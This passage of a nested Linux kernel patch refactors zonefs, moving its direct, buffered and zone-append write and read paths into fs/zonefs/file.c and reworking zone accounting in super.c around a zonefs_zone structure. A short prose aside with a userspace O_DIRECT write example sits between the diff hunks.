++	 * This will always be a no-op for the case where the block size is
++	 * equal to the page size.
++	 */
++	start = iocb->ki_pos >> PAGE_SHIFT;
++	end = (iocb->ki_pos + iov_iter_count(from) - 1) >> PAGE_SHIFT;
++	if (invalidate_inode_pages2_range(inode->i_mapping, start, end))
++		return -EBUSY;
++
++	nr_pages = iov_iter_npages(from, BIO_MAX_VECS);
++	if (!nr_pages)
++		return 0;
++
++	bio = bio_alloc(bdev, nr_pages,
++			REQ_OP_ZONE_APPEND | REQ_SYNC | REQ_IDLE, GFP_NOFS);
++	bio->bi_iter.bi_sector = z->z_sector;
++	bio->bi_ioprio = iocb->ki_ioprio;
++	if (iocb_is_dsync(iocb))
++		bio->bi_opf |= REQ_FUA;
++
++	ret = bio_iov_iter_get_pages(bio, from);
++	if (unlikely(ret))
++		goto out_release;
++
++	size = bio->bi_iter.bi_size;
++	task_io_account_write(size);
++
++	if (iocb->ki_flags & IOCB_HIPRI)
++		bio_set_polled(bio, iocb);
++
++	ret = submit_bio_wait(bio);
++
++	/*
++	 * If the file zone was written underneath the file system, the zone
++	 * write pointer may not be where we expect it to be, but the zone
++	 * append write can still succeed. So check manually that we wrote where
++	 * we intended to, that is, at z->z_wpoffset.
++	 */
++	if (!ret) {
++		sector_t wpsector =
++			z->z_sector + (z->z_wpoffset >> SECTOR_SHIFT);
++
++		if (bio->bi_iter.bi_sector != wpsector) {
++			zonefs_warn(inode->i_sb,
++				"Corrupted write pointer %llu for zone at %llu\n",
++				bio->bi_iter.bi_sector, z->z_sector);
++			ret = -EIO;
++		}
++	}
++
++	zonefs_file_write_dio_end_io(iocb, size, ret, 0);
++	trace_zonefs_file_dio_append(inode, size, ret);
++
++out_release:
++	bio_release_pages(bio, false);
++	bio_put(bio);
++
++	if (ret >= 0) {
++		iocb->ki_pos += size;
++		return size;
++	}
++
++	return ret;
++}
++
++/*
++ * Do not exceed the LFS limits nor the file zone size. If pos is under the
++ * limit it becomes a short access. If it exceeds the limit, return -EFBIG.
++ */
++static loff_t zonefs_write_check_limits(struct file *file, loff_t pos,
++					loff_t count)
++{
++	struct inode *inode = file_inode(file);
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
++	loff_t limit = rlimit(RLIMIT_FSIZE);
++	loff_t max_size = z->z_capacity;
++
++	if (limit != RLIM_INFINITY) {
++		if (pos >= limit) {
++			send_sig(SIGXFSZ, current, 0);
++			return -EFBIG;
++		}
++		count = min(count, limit - pos);
++	}
++
++	if (!(file->f_flags & O_LARGEFILE))
++		max_size = min_t(loff_t, MAX_NON_LFS, max_size);
++
++	if (unlikely(pos >= max_size))
++		return -EFBIG;
++
++	return min(count, max_size - pos);
++}
++
++static ssize_t zonefs_write_checks(struct kiocb *iocb, struct iov_iter *from)
++{
++	struct file *file = iocb->ki_filp;
++	struct inode *inode = file_inode(file);
++	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
++	loff_t count;
++
++	if (IS_SWAPFILE(inode))
++		return -ETXTBSY;
++
++	if (!iov_iter_count(from))
++		return 0;
++
++	if ((iocb->ki_flags & IOCB_NOWAIT) && !(iocb->ki_flags & IOCB_DIRECT))
++		return -EINVAL;
++
++	if (iocb->ki_flags & IOCB_APPEND) {
++		if (zonefs_zone_is_cnv(z))
++			return -EINVAL;
++		mutex_lock(&zi->i_truncate_mutex);
++		iocb->ki_pos = z->z_wpoffset;
++		mutex_unlock(&zi->i_truncate_mutex);
++	}
++
++	count = zonefs_write_check_limits(file, iocb->ki_pos,
++					  iov_iter_count(from));
++	if (count < 0)
++		return count;
++
++	iov_iter_truncate(from, count);
++	return iov_iter_count(from);
++}
++
++/*
++ * Handle direct writes. For sequential zone files, this is the only possible
++ * write path. For these files, check that the user is issuing writes
++ * sequentially from the end of the file. This code assumes that the block layer
++ * delivers write requests to the device in sequential order. This is always the
++ * case if a block IO scheduler implementing the ELEVATOR_F_ZBD_SEQ_WRITE
++ * elevator feature is being used (e.g. mq-deadline). The block layer
++ * always automatically selects such an elevator for zoned block devices
++ * during device initialization.
++ */
++static ssize_t zonefs_file_dio_write(struct kiocb *iocb, struct iov_iter *from)
++{
++	struct inode *inode = file_inode(iocb->ki_filp);
++	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
++	struct super_block *sb = inode->i_sb;
++	bool sync = is_sync_kiocb(iocb);
++	bool append = false;
++	ssize_t ret, count;
++
++	/*
++	 * For async direct IOs to sequential zone files, refuse IOCB_NOWAIT
++	 * as this can cause write reordering (e.g. the first aio gets EAGAIN
++	 * on the inode lock but the second goes through and is now unaligned).
++	 */
++	if (zonefs_zone_is_seq(z) && !sync && (iocb->ki_flags & IOCB_NOWAIT))
++		return -EOPNOTSUPP;
++
++	if (iocb->ki_flags & IOCB_NOWAIT) {
++		if (!inode_trylock(inode))
++			return -EAGAIN;
++	} else {
++		inode_lock(inode);
++	}
++
++	count = zonefs_write_checks(iocb, from);
++	if (count <= 0) {
++		ret = count;
++		goto inode_unlock;
++	}
++
++	if ((iocb->ki_pos | count) & (sb->s_blocksize - 1)) {
++		ret = -EINVAL;
++		goto inode_unlock;
++	}
++
++	/* Enforce sequential writes (append only) in sequential zones */
++	if (zonefs_zone_is_seq(z)) {
++		mutex_lock(&zi->i_truncate_mutex);
++		if (iocb->ki_pos != z->z_wpoffset) {
++			mutex_unlock(&zi->i_truncate_mutex);
++			ret = -EINVAL;
++			goto inode_unlock;
++		}
++		mutex_unlock(&zi->i_truncate_mutex);
++		append = sync;
++	}
++
++	if (append) {
++		ret = zonefs_file_dio_append(iocb, from);
++	} else {
++		/*
++		 * iomap_dio_rw() may return ENOTBLK if there was an issue with
++		 * page invalidation. Overwrite that error code with EBUSY to
++		 * be consistent with zonefs_file_dio_append() return value for
++		 * similar issues.
++		 */
++		ret = iomap_dio_rw(iocb, from, &zonefs_write_iomap_ops,
++				   &zonefs_write_dio_ops, 0, NULL, 0);
++		if (ret == -ENOTBLK)
++			ret = -EBUSY;
++	}
++
++	if (zonefs_zone_is_seq(z) &&
++	    (ret > 0 || ret == -EIOCBQUEUED)) {
++		if (ret > 0)
++			count = ret;
++
++		/*
++		 * Update the zone write pointer offset assuming the write
++		 * operation succeeded. If it did not, the error recovery path
++		 * will correct it. Also do active seq file accounting.
++		 */
++		mutex_lock(&zi->i_truncate_mutex);
++		z->z_wpoffset += count;
++		zonefs_inode_account_active(inode);
++		mutex_unlock(&zi->i_truncate_mutex);
++	}
++
++inode_unlock:
++	inode_unlock(inode);
++
++	return ret;
++}
++
++static ssize_t zonefs_file_buffered_write(struct kiocb *iocb,
++					  struct iov_iter *from)
++{
++	struct inode *inode = file_inode(iocb->ki_filp);
++	ssize_t ret;
++
++	/*
++	 * Direct IO writes are mandatory for sequential zone files so that the
++	 * write IO issuing order is preserved.
++	 */
++	if (zonefs_inode_is_seq(inode))
++		return -EIO;
++
++	if (iocb->ki_flags & IOCB_NOWAIT) {
++		if (!inode_trylock(inode))
++			return -EAGAIN;
++	} else {
++		inode_lock(inode);
++	}
++
++	ret = zonefs_write_checks(iocb, from);
++	if (ret <= 0)
++		goto inode_unlock;
++
++	ret = iomap_file_buffered_write(iocb, from, &zonefs_write_iomap_ops);
++	if (ret > 0)
++		iocb->ki_pos += ret;
++	else if (ret == -EIO)
++		zonefs_io_error(inode, true);
++
++inode_unlock:
++	inode_unlock(inode);
++	if (ret > 0)
++		ret = generic_write_sync(iocb, ret);
++
++	return ret;
++}
++
++static ssize_t zonefs_file_write_iter(struct kiocb *iocb, struct iov_iter *from)
++{
++	struct inode *inode = file_inode(iocb->ki_filp);
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
++
++	if (unlikely(IS_IMMUTABLE(inode)))
++		return -EPERM;
++
++	if (sb_rdonly(inode->i_sb))
++		return -EROFS;
++
++	/* Write operations beyond the zone capacity are not allowed */
++	if (iocb->ki_pos >= z->z_capacity)
++		return -EFBIG;
++
++	if (iocb->ki_flags & IOCB_DIRECT) {
++		ssize_t ret = zonefs_file_dio_write(iocb, from);
++
++		if (ret != -ENOTBLK)
++			return ret;
++	}
++
++	return zonefs_file_buffered_write(iocb, from);
++}
++
++static int zonefs_file_read_dio_end_io(struct kiocb *iocb, ssize_t size,
++				       int error, unsigned int flags)
++{
++	if (error) {
++		zonefs_io_error(file_inode(iocb->ki_filp), false);
++		return error;
++	}
++
++	return 0;
++}
++
++static const struct iomap_dio_ops zonefs_read_dio_ops = {
++	.end_io			= zonefs_file_read_dio_end_io,
++};
++
++static ssize_t zonefs_file_read_iter(struct kiocb *iocb, struct iov_iter *to)
++{
++	struct inode *inode = file_inode(iocb->ki_filp);
++	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
++	struct super_block *sb = inode->i_sb;
++	loff_t isize;
++	ssize_t ret;
++
++	/* Offline zones cannot be read */
++	if (unlikely(IS_IMMUTABLE(inode) && !(inode->i_mode & 0777)))
++		return -EPERM;
++
++	if (iocb->ki_pos >= z->z_capacity)
++		return 0;
++
++	if (iocb->ki_flags & IOCB_NOWAIT) {
++		if (!inode_trylock_shared(inode))
++			return -EAGAIN;
++	} else {
++		inode_lock_shared(inode);
++	}
++
++	/* Limit read operations to written data */
++	mutex_lock(&zi->i_truncate_mutex);
++	isize = i_size_read(inode);
++	if (iocb->ki_pos >= isize) {
++		mutex_unlock(&zi->i_truncate_mutex);
++		ret = 0;
++		goto inode_unlock;
++	}
++	iov_iter_truncate(to, isize - iocb->ki_pos);
++	mutex_unlock(&zi->i_truncate_mutex);
++
++	if (iocb->ki_flags & IOCB_DIRECT) {
++		size_t count = iov_iter_count(to);
++
++		if ((iocb->ki_pos | count) & (sb->s_blocksize - 1)) {
++			ret = -EINVAL;
++			goto inode_unlock;
++		}
++		file_accessed(iocb->ki_filp);
++		ret = iomap_dio_rw(iocb, to, &zonefs_read_iomap_ops,
++				   &zonefs_read_dio_ops, 0, NULL, 0);
++	} else {
++		ret = generic_file_read_iter(iocb, to);
++		if (ret == -EIO)
++			zonefs_io_error(inode, false);
++	}
++
++inode_unlock:
++	inode_unlock_shared(inode);
++
++	return ret;
++}
++
++/*
++ * Write open accounting is done only for sequential files.
++ */
++static inline bool zonefs_seq_file_need_wro(struct inode *inode,
++					    struct file *file)
++{
++	if (zonefs_inode_is_cnv(inode))
++		return false;
++
++	if (!(file->f_mode & FMODE_WRITE))
++		return false;
++
++	return true;
++}
++
++static int zonefs_seq_file_write_open(struct inode *inode)
++{
++	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
++	int ret = 0;
++
++	mutex_lock(&zi->i_truncate_mutex);
++
++	if (!zi->i_wr_refcnt) {
++		struct zonefs_sb_info *sbi = ZONEFS_SB(inode->i_sb);
++		unsigned int wro = atomic_inc_return(&sbi->s_wro_seq_files);
++
++		if (sbi->s_mount_opts & ZONEFS_MNTOPT_EXPLICIT_OPEN) {
++
++			if (sbi->s_max_wro_seq_files
++			    && wro > sbi->s_max_wro_seq_files) {
++				atomic_dec(&sbi->s_wro_seq_files);
++				ret = -EBUSY;
++				goto unlock;
++			}
++
++			if (i_size_read(inode) < z->z_capacity) {
++				ret = zonefs_inode_zone_mgmt(inode,
++							     REQ_OP_ZONE_OPEN);
++				if (ret) {
++					atomic_dec(&sbi->s_wro_seq_files);
++					goto unlock;
++				}
++				z->z_flags |= ZONEFS_ZONE_OPEN;
++				zonefs_inode_account_active(inode);
++			}
++		}
++	}
++
++	zi->i_wr_refcnt++;
++
++unlock:
++	mutex_unlock(&zi->i_truncate_mutex);
++
++	return ret;
++}
++
++static int zonefs_file_open(struct inode *inode, struct file *file)
++{
++	int ret;
++
++	ret = generic_file_open(inode, file);
++	if (ret)
++		return ret;
++
++	if (zonefs_seq_file_need_wro(inode, file))
++		return zonefs_seq_file_write_open(inode);
++
++	return 0;
++}
++
++static void zonefs_seq_file_write_close(struct inode *inode)
++{
++	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
++	struct super_block *sb = inode->i_sb;
++	struct zonefs_sb_info *sbi = ZONEFS_SB(sb);
++	int ret = 0;
++
++	mutex_lock(&zi->i_truncate_mutex);
++
++	zi->i_wr_refcnt--;
++	if (zi->i_wr_refcnt)
++		goto unlock;
++
++	/*
++	 * The file zone may not be open anymore (e.g. the file was truncated to
++	 * its maximum size or it was fully written). For this case, we only
++	 * need to decrement the write open count.
++	 */
++	if (z->z_flags & ZONEFS_ZONE_OPEN) {
++		ret = zonefs_inode_zone_mgmt(inode, REQ_OP_ZONE_CLOSE);
++		if (ret) {
++			__zonefs_io_error(inode, false);
++			/*
++			 * Leaving zones explicitly open may lead to a state
++			 * where most zones cannot be written (zone resources
++			 * exhausted). So take preventive action by remounting
++			 * read-only.
++			 */
++			if (z->z_flags & ZONEFS_ZONE_OPEN &&
++			    !(sb->s_flags & SB_RDONLY)) {
++				zonefs_warn(sb,
++					"closing zone at %llu failed %d\n",
++					z->z_sector, ret);
++				zonefs_warn(sb,
++					"remounting filesystem read-only\n");
++				sb->s_flags |= SB_RDONLY;
++			}
++			goto unlock;
++		}
++
++		z->z_flags &= ~ZONEFS_ZONE_OPEN;
++		zonefs_inode_account_active(inode);
++	}
++
++	atomic_dec(&sbi->s_wro_seq_files);
++
++unlock:
++	mutex_unlock(&zi->i_truncate_mutex);
++}
++
++static int zonefs_file_release(struct inode *inode, struct file *file)
++{
++	/*
++	 * If we explicitly open a zone we must close it again as well, but the
++	 * zone management operation can fail (either due to an IO error or as
++	 * the zone has gone offline or read-only). Make sure we don't fail the
++	 * close(2) for user-space.
++	 */
++	if (zonefs_seq_file_need_wro(inode, file))
++		zonefs_seq_file_write_close(inode);
++
++	return 0;
++}
++
++const struct file_operations zonefs_file_operations = {
++	.open		= zonefs_file_open,
++	.release	= zonefs_file_release,
++	.fsync		= zonefs_file_fsync,
++	.mmap		= zonefs_file_mmap,
++	.llseek		= zonefs_file_llseek,
++	.read_iter	= zonefs_file_read_iter,
++	.write_iter	= zonefs_file_write_iter,
++	.splice_read	= generic_file_splice_read,
++	.splice_write	= iter_file_splice_write,
++	.iopoll		= iocb_bio_iopoll,
++};
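
The write path in the new fs/zonefs/file.c enforces a strict contract
on sequential zone files: writes must be O_DIRECT, block-size aligned,
and issued exactly at the zone write pointer, which zonefs exposes as
the file size. A small userspace illustration of that contract; the
mount path and the 4 KiB block size are assumptions for the example:

	#define _GNU_SOURCE
	#include <fcntl.h>
	#include <stdlib.h>
	#include <string.h>
	#include <unistd.h>

	int main(void)
	{
		int fd = open("/mnt/zonefs/seq/0", O_WRONLY | O_DIRECT);
		void *buf;
		off_t wp;

		if (fd < 0)
			return 1;
		/* the inode size is the current zone write pointer */
		wp = lseek(fd, 0, SEEK_END);
		if (posix_memalign(&buf, 4096, 4096))
			return 1;
		memset(buf, 0xab, 4096);
		/* a misaligned pos/len, or pos != wp, gets -EINVAL above */
		if (pwrite(fd, buf, 4096, wp) != 4096)
			return 1;
		free(buf);
		return close(fd);
	}
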
+diff --git a/fs/zonefs/super.c b/fs/zonefs/super.c
+index a9c5c3f720adf..270ded209dde5 100644
+--- a/fs/zonefs/super.c
++++ b/fs/zonefs/super.c
+@@ -28,33 +28,47 @@
+ #include "trace.h"
+ 
+ /*
+- * Manage the active zone count. Called with zi->i_truncate_mutex held.
++ * Get the name of a zone group directory.
+  */
+-static void zonefs_account_active(struct inode *inode)
++static const char *zonefs_zgroup_name(enum zonefs_ztype ztype)
+ {
+-	struct zonefs_sb_info *sbi = ZONEFS_SB(inode->i_sb);
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++	switch (ztype) {
++	case ZONEFS_ZTYPE_CNV:
++		return "cnv";
++	case ZONEFS_ZTYPE_SEQ:
++		return "seq";
++	default:
++		WARN_ON_ONCE(1);
++		return "???";
++	}
++}
+ 
+-	lockdep_assert_held(&zi->i_truncate_mutex);
++/*
++ * Manage the active zone count.
++ */
++static void zonefs_account_active(struct super_block *sb,
++				  struct zonefs_zone *z)
++{
++	struct zonefs_sb_info *sbi = ZONEFS_SB(sb);
+ 
+-	if (zi->i_ztype != ZONEFS_ZTYPE_SEQ)
++	if (zonefs_zone_is_cnv(z))
+ 		return;
+ 
+ 	/*
+ 	 * For zones that transitioned to the offline or readonly condition,
+ 	 * we only need to clear the active state.
+ 	 */
+-	if (zi->i_flags & (ZONEFS_ZONE_OFFLINE | ZONEFS_ZONE_READONLY))
++	if (z->z_flags & (ZONEFS_ZONE_OFFLINE | ZONEFS_ZONE_READONLY))
+ 		goto out;
+ 
+ 	/*
+ 	 * If the zone is active, that is, if it is explicitly open or
+ 	 * partially written, check if it was already accounted as active.
+ 	 */
+-	if ((zi->i_flags & ZONEFS_ZONE_OPEN) ||
+-	    (zi->i_wpoffset > 0 && zi->i_wpoffset < zi->i_max_size)) {
+-		if (!(zi->i_flags & ZONEFS_ZONE_ACTIVE)) {
+-			zi->i_flags |= ZONEFS_ZONE_ACTIVE;
++	if ((z->z_flags & ZONEFS_ZONE_OPEN) ||
++	    (z->z_wpoffset > 0 && z->z_wpoffset < z->z_capacity)) {
++		if (!(z->z_flags & ZONEFS_ZONE_ACTIVE)) {
++			z->z_flags |= ZONEFS_ZONE_ACTIVE;
+ 			atomic_inc(&sbi->s_active_seq_files);
+ 		}
+ 		return;
+@@ -62,18 +76,29 @@ static void zonefs_account_active(struct inode *inode)
+ 
+ out:
+ 	/* The zone is not active. If it was, update the active count */
+-	if (zi->i_flags & ZONEFS_ZONE_ACTIVE) {
+-		zi->i_flags &= ~ZONEFS_ZONE_ACTIVE;
++	if (z->z_flags & ZONEFS_ZONE_ACTIVE) {
++		z->z_flags &= ~ZONEFS_ZONE_ACTIVE;
+ 		atomic_dec(&sbi->s_active_seq_files);
+ 	}
+ }
+ 
+-static inline int zonefs_zone_mgmt(struct inode *inode, enum req_op op)
++/*
++ * Manage the active zone count. Called with zi->i_truncate_mutex held.
++ */
++void zonefs_inode_account_active(struct inode *inode)
+ {
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	int ret;
++	lockdep_assert_held(&ZONEFS_I(inode)->i_truncate_mutex);
+ 
+-	lockdep_assert_held(&zi->i_truncate_mutex);
++	return zonefs_account_active(inode->i_sb, zonefs_inode_zone(inode));
++}
++
++/*
++ * Execute a zone management operation.
++ */
++static int zonefs_zone_mgmt(struct super_block *sb,
++			    struct zonefs_zone *z, enum req_op op)
++{
++	int ret;
+ 
+ 	/*
+ 	 * With ZNS drives, closing an explicitly open zone that has not been
+@@ -83,201 +108,49 @@ static inline int zonefs_zone_mgmt(struct inode *inode, enum req_op op)
+ 	 * are exceeded, make sure that the zone does not remain active by
+ 	 * resetting it.
+ 	 */
+-	if (op == REQ_OP_ZONE_CLOSE && !zi->i_wpoffset)
++	if (op == REQ_OP_ZONE_CLOSE && !z->z_wpoffset)
+ 		op = REQ_OP_ZONE_RESET;
+ 
+-	trace_zonefs_zone_mgmt(inode, op);
+-	ret = blkdev_zone_mgmt(inode->i_sb->s_bdev, op, zi->i_zsector,
+-			       zi->i_zone_size >> SECTOR_SHIFT, GFP_NOFS);
++	trace_zonefs_zone_mgmt(sb, z, op);
++	ret = blkdev_zone_mgmt(sb->s_bdev, op, z->z_sector,
++			       z->z_size >> SECTOR_SHIFT, GFP_NOFS);
+ 	if (ret) {
+-		zonefs_err(inode->i_sb,
++		zonefs_err(sb,
+ 			   "Zone management operation %s at %llu failed %d\n",
+-			   blk_op_str(op), zi->i_zsector, ret);
++			   blk_op_str(op), z->z_sector, ret);
+ 		return ret;
+ 	}
+ 
+ 	return 0;
+ }
+ 
+-static inline void zonefs_i_size_write(struct inode *inode, loff_t isize)
++int zonefs_inode_zone_mgmt(struct inode *inode, enum req_op op)
+ {
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++	lockdep_assert_held(&ZONEFS_I(inode)->i_truncate_mutex);
+ 
+-	i_size_write(inode, isize);
+-	/*
+-	 * A full zone is no longer open/active and does not need
+-	 * explicit closing.
+-	 */
+-	if (isize >= zi->i_max_size) {
+-		struct zonefs_sb_info *sbi = ZONEFS_SB(inode->i_sb);
+-
+-		if (zi->i_flags & ZONEFS_ZONE_ACTIVE)
+-			atomic_dec(&sbi->s_active_seq_files);
+-		zi->i_flags &= ~(ZONEFS_ZONE_OPEN | ZONEFS_ZONE_ACTIVE);
+-	}
++	return zonefs_zone_mgmt(inode->i_sb, zonefs_inode_zone(inode), op);
+ }
+ 
+-static int zonefs_read_iomap_begin(struct inode *inode, loff_t offset,
+-				   loff_t length, unsigned int flags,
+-				   struct iomap *iomap, struct iomap *srcmap)
++void zonefs_i_size_write(struct inode *inode, loff_t isize)
+ {
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	struct super_block *sb = inode->i_sb;
+-	loff_t isize;
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
+ 
+-	/*
+-	 * All blocks are always mapped below EOF. If reading past EOF,
+-	 * act as if there is a hole up to the file maximum size.
+-	 */
+-	mutex_lock(&zi->i_truncate_mutex);
+-	iomap->bdev = inode->i_sb->s_bdev;
+-	iomap->offset = ALIGN_DOWN(offset, sb->s_blocksize);
+-	isize = i_size_read(inode);
+-	if (iomap->offset >= isize) {
+-		iomap->type = IOMAP_HOLE;
+-		iomap->addr = IOMAP_NULL_ADDR;
+-		iomap->length = length;
+-	} else {
+-		iomap->type = IOMAP_MAPPED;
+-		iomap->addr = (zi->i_zsector << SECTOR_SHIFT) + iomap->offset;
+-		iomap->length = isize - iomap->offset;
+-	}
+-	mutex_unlock(&zi->i_truncate_mutex);
+-
+-	trace_zonefs_iomap_begin(inode, iomap);
+-
+-	return 0;
+-}
+-
+-static const struct iomap_ops zonefs_read_iomap_ops = {
+-	.iomap_begin	= zonefs_read_iomap_begin,
+-};
+-
+-static int zonefs_write_iomap_begin(struct inode *inode, loff_t offset,
+-				    loff_t length, unsigned int flags,
+-				    struct iomap *iomap, struct iomap *srcmap)
+-{
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	struct super_block *sb = inode->i_sb;
+-	loff_t isize;
+-
+-	/* All write I/Os should always be within the file maximum size */
+-	if (WARN_ON_ONCE(offset + length > zi->i_max_size))
+-		return -EIO;
+-
+-	/*
+-	 * Sequential zones can only accept direct writes. This is already
+-	 * checked when writes are issued, so warn if we see a page writeback
+-	 * operation.
+-	 */
+-	if (WARN_ON_ONCE(zi->i_ztype == ZONEFS_ZTYPE_SEQ &&
+-			 !(flags & IOMAP_DIRECT)))
+-		return -EIO;
++	i_size_write(inode, isize);
+ 
+ 	/*
+-	 * For conventional zones, all blocks are always mapped. For sequential
+-	 * zones, all blocks after always mapped below the inode size (zone
+-	 * write pointer) and unwriten beyond.
++	 * A full zone is no longer open/active and does not need
++	 * explicit closing.
+ 	 */
+-	mutex_lock(&zi->i_truncate_mutex);
+-	iomap->bdev = inode->i_sb->s_bdev;
+-	iomap->offset = ALIGN_DOWN(offset, sb->s_blocksize);
+-	iomap->addr = (zi->i_zsector << SECTOR_SHIFT) + iomap->offset;
+-	isize = i_size_read(inode);
+-	if (iomap->offset >= isize) {
+-		iomap->type = IOMAP_UNWRITTEN;
+-		iomap->length = zi->i_max_size - iomap->offset;
+-	} else {
+-		iomap->type = IOMAP_MAPPED;
+-		iomap->length = isize - iomap->offset;
+-	}
+-	mutex_unlock(&zi->i_truncate_mutex);
+-
+-	trace_zonefs_iomap_begin(inode, iomap);
+-
+-	return 0;
+-}
+-
+-static const struct iomap_ops zonefs_write_iomap_ops = {
+-	.iomap_begin	= zonefs_write_iomap_begin,
+-};
+-
+-static int zonefs_read_folio(struct file *unused, struct folio *folio)
+-{
+-	return iomap_read_folio(folio, &zonefs_read_iomap_ops);
+-}
+-
+-static void zonefs_readahead(struct readahead_control *rac)
+-{
+-	iomap_readahead(rac, &zonefs_read_iomap_ops);
+-}
+-
+-/*
+- * Map blocks for page writeback. This is used only on conventional zone files,
+- * which implies that the page range can only be within the fixed inode size.
+- */
+-static int zonefs_write_map_blocks(struct iomap_writepage_ctx *wpc,
+-				   struct inode *inode, loff_t offset)
+-{
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-
+-	if (WARN_ON_ONCE(zi->i_ztype != ZONEFS_ZTYPE_CNV))
+-		return -EIO;
+-	if (WARN_ON_ONCE(offset >= i_size_read(inode)))
+-		return -EIO;
+-
+-	/* If the mapping is already OK, nothing needs to be done */
+-	if (offset >= wpc->iomap.offset &&
+-	    offset < wpc->iomap.offset + wpc->iomap.length)
+-		return 0;
+-
+-	return zonefs_write_iomap_begin(inode, offset, zi->i_max_size - offset,
+-					IOMAP_WRITE, &wpc->iomap, NULL);
+-}
+-
+-static const struct iomap_writeback_ops zonefs_writeback_ops = {
+-	.map_blocks		= zonefs_write_map_blocks,
+-};
+-
+-static int zonefs_writepages(struct address_space *mapping,
+-			     struct writeback_control *wbc)
+-{
+-	struct iomap_writepage_ctx wpc = { };
+-
+-	return iomap_writepages(mapping, wbc, &wpc, &zonefs_writeback_ops);
+-}
+-
+-static int zonefs_swap_activate(struct swap_info_struct *sis,
+-				struct file *swap_file, sector_t *span)
+-{
+-	struct inode *inode = file_inode(swap_file);
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++	if (isize >= z->z_capacity) {
++		struct zonefs_sb_info *sbi = ZONEFS_SB(inode->i_sb);
+ 
+-	if (zi->i_ztype != ZONEFS_ZTYPE_CNV) {
+-		zonefs_err(inode->i_sb,
+-			   "swap file: not a conventional zone file\n");
+-		return -EINVAL;
++		if (z->z_flags & ZONEFS_ZONE_ACTIVE)
++			atomic_dec(&sbi->s_active_seq_files);
++		z->z_flags &= ~(ZONEFS_ZONE_OPEN | ZONEFS_ZONE_ACTIVE);
+ 	}
+-
+-	return iomap_swapfile_activate(sis, swap_file, span,
+-				       &zonefs_read_iomap_ops);
+ }
+ 
+-static const struct address_space_operations zonefs_file_aops = {
+-	.read_folio		= zonefs_read_folio,
+-	.readahead		= zonefs_readahead,
+-	.writepages		= zonefs_writepages,
+-	.dirty_folio		= filemap_dirty_folio,
+-	.release_folio		= iomap_release_folio,
+-	.invalidate_folio	= iomap_invalidate_folio,
+-	.migrate_folio		= filemap_migrate_folio,
+-	.is_partially_uptodate	= iomap_is_partially_uptodate,
+-	.error_remove_page	= generic_error_remove_page,
+-	.direct_IO		= noop_direct_IO,
+-	.swap_activate		= zonefs_swap_activate,
+-};
+-
+-static void zonefs_update_stats(struct inode *inode, loff_t new_isize)
++void zonefs_update_stats(struct inode *inode, loff_t new_isize)
+ {
+ 	struct super_block *sb = inode->i_sb;
+ 	struct zonefs_sb_info *sbi = ZONEFS_SB(sb);
+@@ -310,63 +183,68 @@ static void zonefs_update_stats(struct inode *inode, loff_t new_isize)
+ }
+ 
+ /*
+- * Check a zone condition and adjust its file inode access permissions for
+- * offline and readonly zones. Return the inode size corresponding to the
+- * amount of readable data in the zone.
++ * Check a zone condition. Return the amount of written (and still readable)
++ * data in the zone.
+  */
+-static loff_t zonefs_check_zone_condition(struct inode *inode,
+-					  struct blk_zone *zone, bool warn,
+-					  bool mount)
++static loff_t zonefs_check_zone_condition(struct super_block *sb,
++					  struct zonefs_zone *z,
++					  struct blk_zone *zone)
+ {
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-
+ 	switch (zone->cond) {
+ 	case BLK_ZONE_COND_OFFLINE:
+-		/*
+-		 * Dead zone: make the inode immutable, disable all accesses
+-		 * and set the file size to 0 (zone wp set to zone start).
+-		 */
+-		if (warn)
+-			zonefs_warn(inode->i_sb, "inode %lu: offline zone\n",
+-				    inode->i_ino);
+-		inode->i_flags |= S_IMMUTABLE;
+-		inode->i_mode &= ~0777;
+-		zone->wp = zone->start;
+-		zi->i_flags |= ZONEFS_ZONE_OFFLINE;
++		zonefs_warn(sb, "Zone %llu: offline zone\n",
++			    z->z_sector);
++		z->z_flags |= ZONEFS_ZONE_OFFLINE;
+ 		return 0;
+ 	case BLK_ZONE_COND_READONLY:
+ 		/*
+-		 * The write pointer of read-only zones is invalid. If such a
+-		 * zone is found during mount, the file size cannot be retrieved
+-		 * so we treat the zone as offline (mount == true case).
+-		 * Otherwise, keep the file size as it was when last updated
+-		 * so that the user can recover data. In both cases, writes are
+-		 * always disabled for the zone.
++		 * The write pointer of read-only zones is invalid, so we cannot
++		 * determine the zone wpoffset (inode size). We thus keep the
++		 * zone wpoffset as is, which leads to an empty file
++		 * (wpoffset == 0) on mount. For a runtime error, this keeps
++		 * the inode size as it was when last updated so that the user
++		 * can recover data.
+ 		 */
+-		if (warn)
+-			zonefs_warn(inode->i_sb, "inode %lu: read-only zone\n",
+-				    inode->i_ino);
+-		inode->i_flags |= S_IMMUTABLE;
+-		if (mount) {
+-			zone->cond = BLK_ZONE_COND_OFFLINE;
+-			inode->i_mode &= ~0777;
+-			zone->wp = zone->start;
+-			zi->i_flags |= ZONEFS_ZONE_OFFLINE;
+-			return 0;
+-		}
+-		zi->i_flags |= ZONEFS_ZONE_READONLY;
+-		inode->i_mode &= ~0222;
+-		return i_size_read(inode);
++		zonefs_warn(sb, "Zone %llu: read-only zone\n",
++			    z->z_sector);
++		z->z_flags |= ZONEFS_ZONE_READONLY;
++		if (zonefs_zone_is_cnv(z))
++			return z->z_capacity;
++		return z->z_wpoffset;
+ 	case BLK_ZONE_COND_FULL:
+ 		/* The write pointer of full zones is invalid. */
+-		return zi->i_max_size;
++		return z->z_capacity;
+ 	default:
+-		if (zi->i_ztype == ZONEFS_ZTYPE_CNV)
+-			return zi->i_max_size;
